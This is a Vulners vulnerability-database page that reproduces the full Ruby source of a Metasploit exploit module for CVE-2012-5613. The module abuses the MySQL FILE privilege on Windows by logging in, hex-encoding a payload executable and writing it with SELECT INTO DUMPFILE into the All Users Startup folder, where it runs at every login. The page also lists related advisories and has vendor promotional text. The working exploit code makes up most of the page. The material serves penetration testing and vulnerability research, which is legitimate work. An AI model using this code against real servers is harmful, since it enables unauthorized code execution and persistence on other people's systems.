Vulners
Lucene search
Oracle MySQL for Microsoft Windows FILE Privilege Abuse
🗓️ 25 Jul 2013 03:14:13Reported by sinn3r <[email protected]>, Sean Verity <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 43 Views
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Oracle MySQL for Microsoft Windows MOF Execution Vulnerability | 6 Dec 201200:00 | – | zdt |
| Oracle MySQL for Microsoft Windows FILE Privilege Abuse Exploit | 14 Jan 201500:00 | – | zdt |
 | Exploit for CVE-2012-5613 | 9 Feb 201304:59 | – | githubexploit |
 | CVE-2012-5613 | 2 Dec 201200:00 | – | circl |
 | Oracle MySQL for Windows Elevation of Privilege (CVE-2012-5613) | 9 Jun 201300:00 | – | checkpoint_advisories |
 | CVE-2012-5613 | 3 Dec 201200:00 | – | cve |
 | CVE-2012-5613 | 3 Dec 201200:00 | – | cvelist |
 | Oracle MySQL (Windows) - MOF Execution (Metasploit) | 6 Dec 201200:00 | – | exploitdb |
| Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit) | 13 Jan 201500:00 | – | exploitdb |
 | GLSA-201308-06 : MySQL: Multiple vulnerabilities | 30 Aug 201300:00 | – | nessus |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::OptionalSession::MySQL
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
'Description' => %q{
This module takes advantage of a file privilege misconfiguration problem
specifically against Windows MySQL servers. This module abuses the FILE
privilege to write a payload to Microsoft's All Users Start Up directory
which will execute every time a user logs in. The default All Users Start
Up directory used by the module is present on Windows 7.
},
'Author' =>
[
'sinn3r',
'Sean Verity <veritysr1980[at]gmail.com>'
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => true
},
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-5613'], #DISPUTED
['OSVDB', '88118'],
['EDB', '23083'],
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/13']
],
'Platform' => 'win',
'Targets' =>
[
[ 'MySQL on Windows', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2012-12-01'
))
register_options(
[
OptString.new('USERNAME', [ true, 'The username to authenticate as']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
])
end
def check
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
return Exploit::CheckCode::Safe unless m
return Exploit::CheckCode::Appears if is_windows?
Exploit::CheckCode::Safe
end
def query(q)
rows = []
begin
res = mysql_query(q)
return rows unless res
res.each_hash do |row|
rows << row
end
rescue ::Rex::Proto::MySQL::Client::ParseError
return rows
end
rows
end
def is_windows?
r = query("SELECT @@version_compile_os;")
r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
end
def get_drive_letter
r = query("SELECT @@tmpdir;")
drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
drive
end
def upload_file(bin, dest)
p = bin.unpack("H*")[0]
query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
end
def exploit
unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
end
print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") unless session
begin
# If we have a session make use of it
if session
print_status("Using existing session #{session.sid}")
self.mysql_conn = session.client
else
# otherwise fallback to attempting to login
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
return unless m
end
rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
fail_with(Failure::NoAccess, "#{peer} - Access denied")
end
fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m || session
unless is_windows?
fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
end
begin
drive = get_drive_letter
rescue ::Rex::Proto::MySQL::Client::ParseError
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
end
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive
exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
exe = generate_payload_exe
print_status("Uploading to '#{dest}'")
begin
upload_file(exe, dest)
rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
end
register_file_for_cleanup("#{dest}")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Feb 2024 18:19Current
7.4High risk
Vulners AI Score7.4
CVSS 26
EPSS0.31664